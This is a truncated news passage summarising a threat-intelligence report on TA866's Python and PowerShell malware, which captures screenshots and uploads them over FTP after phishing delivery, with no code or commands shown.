The Cyble-based Python malware is designed such that it can capture screenshots on the targeted systems and transfer them to a remote server through FTP (File Transfer Protocol).
FTP enables files and folders to be transferred from a host (targeted system) to another host via a TCP-based network, like the Internet.
The threat actors behind the campaign are the notorious TA866, which has a history of targeting Tatar language speakers and utilizing Python malware to conduct their operations.
How Does TA866 Use Python Malware?
The Tartar Republic Day coincided with the use of this new Python malware by the threat actor TA866, according to CRIL. Up until the end of August, these attacks coincided with the Tartar Republic Day.
The report claims that the threat actor known as TA866 uses a PowerShell script “responsible for taking screenshots and uploading them to a remote FTP server.”
Phishing emails are used by threat actors to select victims for the Python malware attack. These emails have a malicious RAR file encoded within them.
The file includes two innocuous files: a video file an
[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.